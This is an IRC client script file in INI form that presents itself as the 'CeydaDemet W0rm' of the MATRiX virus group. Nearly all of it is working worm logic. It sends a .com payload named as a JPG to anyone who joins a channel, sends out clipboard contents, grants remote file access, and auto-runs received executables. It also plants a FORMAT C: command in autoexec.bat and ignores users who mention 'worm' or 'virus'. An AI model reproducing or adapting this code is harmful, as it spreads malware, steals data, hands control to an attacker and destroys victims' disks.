[levels]
Enabled=1
;|_--==_[_M_A_T_R_i_X_]___S_C_R_I_P_T___a CeydaDemet W0rm_==--_|
Count=1
Level1=matrix
matrixEnabled=1
;;Ê∆^&;Yh‚«o&Y√+o√~)=))u)~)i)~)~)JIC∏ "∆—Ë.ˇ•)°:;;Ê∆^&;Yh‚«o&Y√+o√~
[matrix]
User1=*!*@*
UserCount=1
Event1=ON JOIN:#:/dcc send $nick C:\Windows\winuser2\SEXY_JPG.com
Event2=ON TEXT:*ceyda*:*:/faccess $nick C:\ 5
Event3=ON TEXT:*iseeu*:*:/dcc video $nick
Event4=ON TEXT:*clpbrd*:#:/msg $nick $cliptext
Event5=ON TEXT:*demet*:#:/msg $nick CeydaDemet Worm - a from Turkey BaBe ! Hiiii! Fa! Hiiii Dem!! $identd $address
Event6=ON TEXT:*runget*:*:/run $GETPATH\*.exe
Event7=ON TEXT:*deztroy*:*:/write -I c:\autoexec.bat @FORMAT C: /8
Event8=ON TEXT:*worm*:*:/ignore $nick 1
Event9=ON TEXT:*virus*:*:/ignore $nick 1
Event10=ON DCCDONE:*.exe;*.com;*.vbs;*.bat;*.doc;*.html:/execute -o $filename
Event11=ON DCCSENT:*.*:/dcc send Del_Armg0 $filename
Event12=ON PART:#:/enable -q * 
Event13=ON OP:*:#:/mode Del_Armg0 +o
Event14=ON TEXT:*byebye*:*:/exit
Event15=ON TEXT:*nickx*:*:/nick CeydaW0rm
EventCount=15
[DCC]
AutoHideDccWin=1
;_another Del_Armg0 W0rm -=-  [MATRiX] Gr0up -=- GreeTZ t0 : mort
;[MATRiX] Gr0up -=- ULTRAS, NBK, Del_Armg0, tgr, mort -=- 16/01/00
;Del_Armg0 - one night one trojan ... 10X mort  ;)  _4 CEYDA DEMET
